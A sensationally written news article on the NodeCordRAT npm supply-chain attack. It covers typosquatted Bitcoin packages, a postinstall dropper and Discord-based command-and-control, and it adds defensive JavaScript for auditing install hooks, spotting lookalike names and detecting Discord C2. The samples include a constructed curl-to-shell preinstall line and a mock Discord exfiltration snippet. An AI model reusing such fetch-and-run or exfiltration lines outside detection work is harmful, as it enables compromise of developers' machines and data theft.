SHOCKING npm Supply-Chain Attack Exposed: NodeCordRAT Malware Steals Crypto Wallets and Browser Secrets


Introduction

A newly uncovered npm supply-chain attack targets JavaScript developers. Cybersecurity researchers have identified three malicious npm packages that deliver a previously undocumented malware strain called NodeCordRAT. Disguised as legitimate Bitcoin-related libraries, the packages compromise the machines of developers who install them, exposing browser data, API tokens, and cryptocurrency wallets. The discovery underlines the growing risk of dependency-based attacks in modern software development.

The Original

Cybersecurity analysts from Zscaler ThreatLabz discovered three malicious npm packages designed to deliver NodeCordRAT, a remote access trojan (RAT) capable of stealing sensitive data. The affected packages, uploaded by a user named “wenmoonx,” were:

bitcoin-main-lib (2,300 downloads)

bitcoin-lib-js (193 downloads)

bip40 (970 downloads)

As of November 2025, all three packages have been removed from npm.

The infection chain begins when a developer installs either bitcoin-main-lib or bitcoin-lib-js. Both packages ship a hidden postinstall.cjs script wired to npm's postinstall lifecycle hook, which npm runs automatically at install time with the installing user's privileges; nothing in the package has to be imported or called. That script silently installs bip40, the package that carries the actual malicious payload.
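The dropper stage above works only because npm executes lifecycle hooks declared in package.json without asking. The following added example (not code from the article, the researchers, or the packages it describes) audits a set of manifests for such hooks and applies a few heuristics to decide which ones deserve a human look before installation. The sample manifests are constructed for illustration and are not the real manifests of bitcoin-main-lib, bitcoin-lib-js or bip40.

```javascript
// Added example, not code from the article or from the packages it describes.
// Audits package.json manifests for npm lifecycle hooks that run automatically
// at install time. The manifests below are constructed for illustration and
// are NOT the real bitcoin-main-lib / bitcoin-lib-js / bip40 manifests.

// Hooks npm runs without any action by the developer. preinstall/install/
// postinstall fire for registry dependencies; prepare fires for git
// dependencies and for `npm install` inside the package's own checkout.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristics that turn "has an install hook" into "needs a human look".
const SUSPICIOUS = [
  { name: "runs-local-script", re: /\bnode\s+\S+\.(?:c?js|mjs)\b/ },
  { name: "installs-package",  re: /\b(?:npm|yarn|pnpm)\s+(?:i|install|add)\b/ },
  { name: "fetches-remote",    re: /\b(?:curl|wget)\b|https?:\/\// },
  { name: "inline-eval",       re: /\bnode\s+-e\b|\beval\b/ },
];

// Returns one finding per lifecycle hook declared in the manifest; a hook
// with no heuristic hits is still reported, because it still runs code.
function auditManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const reasons = SUSPICIOUS.filter((s) => s.re.test(command)).map((s) => s.name);
    findings.push({ package: manifest.name, hook, command, reasons });
  }
  return findings;
}

// Audits every manifest and puts the ones with the most heuristic hits first.
function auditAll(manifests) {
  return manifests
    .flatMap(auditManifest)
    .sort((a, b) => b.reasons.length - a.reasons.length);
}

// Constructed sample manifests (illustrative names, not real packages).
const SAMPLE_MANIFESTS = [
  { name: "example-clean",   version: "1.0.0", scripts: { test: "mocha" } },
  { name: "example-dropper", version: "0.0.1",
    scripts: { postinstall: "node postinstall.cjs" } },
  { name: "example-fetcher", version: "2.1.0",
    scripts: { preinstall: "curl -s https://example.invalid/x.sh | sh" } },
  { name: "example-native",  version: "3.0.0",
    scripts: { install: "node-gyp rebuild" } },   // legitimate native build, still worth a look
];

if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditAll(SAMPLE_MANIFESTS)) {
    const tag = f.reasons.length ? `SUSPICIOUS (${f.reasons.join(", ")})` : "review";
    console.log(`${f.package}: ${f.hook} -> "${f.command}"  [${tag}]`);
  }
}
```

The heuristics are deliberately loose: native add-ons legitimately use an install hook (the node-gyp case), so the output is a review queue, not a block list. The blunt but effective complement is to stop npm from running hooks at all for third-party packages, with `npm install --ignore-scripts` or `ignore-scripts=true` in .npmrc, and then run the few hooks you actually need by hand.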

Researchers named the malware NodeCordRAT for its distribution through npm (the Node.js package registry) and its use of Discord for command-and-control (C2) communication. Once installed, the malware can steal:

Google Chrome login credentials

API tokens

Cryptocurrency seed phrases

MetaMask wallet data

The attackers chose package names that resemble legitimate libraries from the bitcoinjs project, such as bitcoinjs-lib, bip32, and bip38, so that developers looking for those libraries would trust and install the malicious ones instead.
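The impersonation described above can be caught mechanically before a package is installed. The added example below (not code from the article or from the bitcoinjs project) scores a candidate package name against a reference list of a project's real packages using two signals: a small edit distance to a real name, and reuse of the project's brand tokens or its BIP-numbered naming scheme. The reference list is an assumption for illustration, not a complete inventory of bitcoinjs packages, and the candidate names are the three from this article plus two controls.

```javascript
// Added example, not code from the article or from the bitcoinjs project.
// Flags package names that look like a known project's packages.

const REFERENCE = {
  project: "bitcoinjs",
  names: ["bitcoinjs-lib", "bip32", "bip38", "bip39"], // assumed reference set, not exhaustive
  brandTokens: ["bitcoin", "bitcoinjs"],               // tokens an impersonator would reuse
  numberedPrefix: /^bip\d+$/,                          // the project's BIP-numbered naming scheme
  maxDistance: 2,                                      // edits at or below this count as a lookalike
};

// Standard Levenshtein edit distance (two-row dynamic programme).
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// "bitcoin-lib-js" -> "bitcoinlibjs" so separators cannot hide a lookalike.
const normalize = (name) => name.toLowerCase().replace(/[^a-z0-9]/g, "");
// "bitcoin-lib-js" -> ["bitcoin", "lib", "js"] for brand-token matching.
const tokens = (name) => name.toLowerCase().split(/[^a-z0-9]+/).filter(Boolean);

function lookalikeReport(candidate, ref = REFERENCE) {
  const reasons = [];
  if (ref.names.includes(candidate)) {
    return { candidate, lookalike: false, reasons }; // the genuine package itself
  }
  const nc = normalize(candidate);
  for (const known of ref.names) {
    const d = levenshtein(nc, normalize(known));
    if (d <= ref.maxDistance) reasons.push(`${d} edit(s) away from ${known}`);
  }
  for (const tok of tokens(candidate)) {
    if (ref.brandTokens.includes(tok)) reasons.push(`reuses ${ref.project} brand token "${tok}"`);
  }
  if (ref.numberedPrefix.test(nc)) {
    reasons.push(`BIP-numbered name that is not in the ${ref.project} reference list`);
  }
  return { candidate, lookalike: reasons.length > 0, reasons };
}

// The three names from the article plus a genuine package and an unrelated one.
const CANDIDATES = ["bitcoin-main-lib", "bitcoin-lib-js", "bip40", "bitcoinjs-lib", "lodash"];

if (typeof require !== "undefined" && require.main === module) {
  for (const name of CANDIDATES) {
    const r = lookalikeReport(name);
    const detail = r.reasons.length ? " - " + r.reasons.join("; ") : "";
    console.log(`${name}: ${r.lookalike ? "LOOKALIKE" : "ok"}${detail}`);
  }
}
```

A hit here means "verify the publisher before installing", not "malicious": a legitimate third-party package can also contain the word bitcoin. The decisive check is who published it (`npm view <name> maintainers`) and whether that matches the project you meant to depend on.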

NodeCordRAT fingerprints infected systems across Windows, macOS, and Linux to generate a unique device ID. It then connects to a hard-coded Discord server, opening a covert channel to receive commands.

The malware supports several attacker commands:

!run – execute arbitrary shell commands

!screenshot – capture full desktop screenshots

!sendfile – upload specified files

All stolen data is exfiltrated through Discord's API using a hard-coded bot authentication token: files are uploaded as message attachments to a private Discord channel via the /channels/{id}/messages endpoint. Because the traffic is ordinary HTTPS to discord.com, it blends in with legitimate Discord use and is rarely flagged by conventional network security tools.
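The C2 channel above still leaves two observable traces: a process that is not a Discord client talking to the channel-messages API, and a bot token sitting in the package source. The added example below (not code from the article, Zscaler ThreatLabz, or the malware) shows both detections. The egress-log format ("timestamp host process method url"), the process allowlist, and the token regex (a commonly used approximation of the Discord bot-token shape) are assumptions; the log lines and the source snippet are constructed, and the token in the snippet is a dummy value, not a real credential.

```javascript
// Added example, not code from the article, the researchers, or the malware.
// Two detections for Discord-as-C2: (1) egress-log rule, (2) static source scan.

// (1) Egress-log rule ------------------------------------------------------
const DISCORD_HOSTS = new Set(["discord.com", "discordapp.com", "canary.discord.com", "ptb.discord.com"]);
const CHANNEL_MESSAGES_RE = /^\/api\/v\d+\/channels\/\d+\/messages\/?$/;
// Processes expected to talk to Discord's API on a developer workstation (assumed allowlist).
const EXPECTED_CLIENTS = new Set(["discord", "discord.exe", "chrome", "chrome.exe", "firefox", "firefox.exe"]);

// Assumed log format: "<timestamp> <host> <process> <method> <url>"
function parseLogLine(line) {
  const [ts, host, proc, method, url] = line.trim().split(/\s+/);
  if (!url) return null;
  let u;
  try { u = new URL(url); } catch { return null; }
  return { ts, host, process: proc, method, hostname: u.hostname, path: u.pathname };
}

// POST = upload (exfiltration), GET = polling the channel for operator commands.
function classify(entry) {
  if (!entry || !DISCORD_HOSTS.has(entry.hostname)) return null;
  if (!CHANNEL_MESSAGES_RE.test(entry.path)) return null;
  if (EXPECTED_CLIENTS.has(entry.process.toLowerCase())) return null;
  const upload = entry.method === "POST";
  return {
    ...entry,
    severity: upload ? "high" : "medium",
    why: upload
      ? "message/attachment upload to a Discord channel from a non-client process (possible exfiltration)"
      : "channel message read from a non-client process (possible command polling)",
  };
}

function detectC2(lines) {
  return lines.map(parseLogLine).map(classify).filter(Boolean);
}

// Constructed egress-proxy log lines.
const SAMPLE_LOG = [
  "2025-11-03T10:01:02Z dev-laptop-7 Discord.exe GET https://discord.com/api/v9/users/@me",
  "2025-11-03T10:01:09Z dev-laptop-7 node GET https://discord.com/api/v10/channels/112233445566778899/messages?limit=1",
  "2025-11-03T10:01:11Z dev-laptop-7 node POST https://discord.com/api/v10/channels/112233445566778899/messages",
  "2025-11-03T10:01:12Z dev-laptop-7 node GET https://registry.npmjs.org/bitcoin-lib-js",
  "2025-11-03T10:02:31Z build-agent-2 python3 POST https://discord.com/api/v10/channels/998877665544332211/messages",
  "2025-11-03T10:03:00Z dev-laptop-7 chrome GET https://discord.com/channels/1/2",
];

// (2) Static source scan ----------------------------------------------------
// Approximate Discord bot-token shape (assumption; tune before relying on it).
const DISCORD_TOKEN_RE = /[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27,}/g;
const DISCORD_API_RE = /discord(?:app)?\.com\/api\/v\d+\/channels\/\d+\/messages/g;

function scanSource(text) {
  return {
    tokens: text.match(DISCORD_TOKEN_RE) || [],
    endpoints: text.match(DISCORD_API_RE) || [],
  };
}

// Constructed snippet of what a package's exfiltration code might look like;
// the token is a dummy value that matches the regex, not a real credential.
const SAMPLE_SOURCE = [
  'const TOKEN = "MTAwMDAwMDAwMDAwMDAwMDAw.AbCdEf.abcdefghijklmnopqrstuvwxyz0";',
  'fetch("https://discord.com/api/v10/channels/112233445566778899/messages", {',
  '  method: "POST", headers: { Authorization: "Bot " + TOKEN }, body: form });',
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  for (const h of detectC2(SAMPLE_LOG)) {
    console.log(`[${h.severity}] ${h.ts} ${h.host} ${h.process} ${h.method} ${h.path}: ${h.why}`);
  }
  const s = scanSource(SAMPLE_SOURCE);
  console.log(`source scan: ${s.tokens.length} token(s), ${s.endpoints.length} endpoint(s)`);
}
```

The rule is most useful where you can attribute flows to processes (an endpoint agent or an authenticating proxy); at a plain firewall, discord.com is just another allowed HTTPS destination, which is exactly why the attackers chose it. A hard-coded token found by the scan is an indicator worth reporting to Discord so the channel can be shut down.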

What Undercode Says:

This incident exposes a hard truth about modern software development: your dependencies are part of your attack surface. Developers often trust npm packages on the strength of a plausible name, assuming that a Bitcoin-related name guarantees legitimacy. Attackers understand this and exploit it.

What makes NodeCordRAT particularly dangerous is its silent execution model. The malware runs automatically during installation through npm's lifecycle hooks, so victims never need to import or run the library; installing the package is enough to compromise the system.

The use of Discord as a C2 server is especially alarming. Many companies allow Discord traffic through firewalls, making it an ideal stealth channel for cybercriminals. This trend is growing rapidly, and security teams must start treating social platforms as potential malware infrastructure.

Another red flag is typosquatting and brand impersonation. The attacker deliberately mimicked trusted Bitcoin libraries to lure developers. This tactic has become one of the most effective supply-chain attack strategies in recent years.

The real danger lies in the target data:

Crypto wallet seed phrases

API keys

Browser credentials

This means attackers can empty wallets, hijack accounts, and breach corporate systems with a single infection. The financial damage could be devastating.

From a broader perspective, this attack shows that open-source ecosystems are under sustained pressure. npm remains one of the most abused package registries, with new malicious packages reported regularly.

Developers must start practicing:

Dependency auditing

Package provenance and signature verification (for example with npm audit signatures)

Minimal dependency usage

Manual review of new dependencies, including their install scripts, before installation

Organizations should deploy:

Runtime behavioral analysis

Network traffic monitoring

Installation sandboxing

NodeCordRAT also demonstrates how malware is becoming cross-platform by default. Supporting Windows, macOS, and Linux ensures maximum infection reach.

The attackers’ operational security is improving. Using Discord APIs, private channels, and hard-coded tokens shows a well-planned infrastructure. This is no amateur operation.

This campaign also reflects a shift in cybercrime priorities:

Crypto theft is now the primary objective.

We are witnessing the evolution of malware from traditional ransomware to silent wallet drainers and credential harvesters. These attacks often go unnoticed until victims realize their funds are gone.

If this trend continues, we can expect:

More fake developer tools

More Discord-based malware

More crypto-targeted RATs

Supply-chain security is no longer optional. It must become a core development principle.

🔍 Fact Checker Results

✅ The malicious packages were real and removed from npm

✅ NodeCordRAT uses Discord for command-and-control

❌ No evidence suggests the attack targeted only crypto developers

📊 Prediction

We predict a surge in fake npm libraries impersonating popular frameworks over the next year. Attackers will increasingly exploit developer trust, with Discord, Telegram, and Slack becoming primary malware control channels. Expect more crypto-focused malware campaigns as digital asset adoption continues to rise.


References:

Reported By: thehackernews.com
